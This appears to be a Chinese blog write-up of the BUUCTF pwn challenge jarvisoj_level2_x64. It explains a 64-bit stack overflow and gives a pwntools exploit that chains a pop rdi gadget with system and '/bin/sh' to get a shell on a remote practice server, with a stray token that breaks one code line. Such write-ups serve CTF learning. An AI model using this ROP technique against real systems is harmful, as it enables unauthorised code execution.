BUUCTF—jarvisoj_level2_x64

先看看开了什么保护机制

打开64位ida看看

就是一个很明显的栈溢出,再去看看有没有后门函数


虽然没有后门函数,但是system和binsh都找到了,所以我们再去找pop_rdi就可以了

这样exp就出来了

from pwn import*
p=remote('node4.buuoj.cn',26489)
binsh=0x600a90
system=0x4004c0
pop_rdi=0x4006b3
ret=0x4004a1
p.recvuntil('Input:\n')
payload=b'a'*0x88+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)ROPgadget 
p.interactive()
posted @ 2022-10-07 16:42  予柒  阅读(246)  评论(0)    收藏  举报
返回顶端
Live2D /*修改地一:waifu.css*/
/*修改地二:waifu.css*/
/*修改地三:live2d.js*/ /*修改地四:waifu-tips.js*/